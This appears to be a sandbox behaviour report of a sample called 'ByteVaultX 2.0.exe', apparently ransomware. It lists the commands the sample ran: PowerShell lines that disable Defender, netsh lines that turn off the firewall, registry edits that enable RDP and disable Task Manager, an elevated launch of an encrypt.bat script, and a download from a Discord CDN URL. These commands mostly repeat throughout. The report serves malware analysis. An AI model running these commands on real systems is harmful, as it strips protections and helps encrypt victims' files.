PID 2640 wrote to memory of 3780 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4228 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 4228 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3252 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3252 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3252 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 3504 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1956 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2640 wrote to memory of 1684 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff979d33cb8,0x7ff979d33cc8,0x7ff979d33cd8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4620 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

